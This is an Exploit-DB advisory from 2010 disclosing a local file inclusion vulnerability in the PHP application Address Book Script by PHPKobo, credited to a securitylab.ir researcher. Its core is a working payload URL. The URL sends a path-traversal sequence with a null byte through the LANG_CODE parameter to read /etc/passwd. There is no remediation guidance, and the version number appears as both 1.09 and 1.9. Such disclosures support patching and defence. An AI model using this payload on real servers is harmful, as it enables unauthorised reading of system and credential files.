Address Book Script 1.09 - Local File Inclusion

EDB-ID:

11754




Platform:

PHP

Date:

2010-03-15


#################################################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: Address Book Script
# Version: 1.9
# Vendor: http://www.phpkobo.com/address_book.php
#################################################################
# Vulnerability Info:
# Type: Local File Inclusion
# Risk: Medium
#################################################################
Vulnerability:
http://site.com/codelib/cfg/common.inc.php?LANG_CODE=../../../../../../etc/passwd%00

#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: info[at]securitylab.ir & whh_iran[at]yahoo.com
###################################################################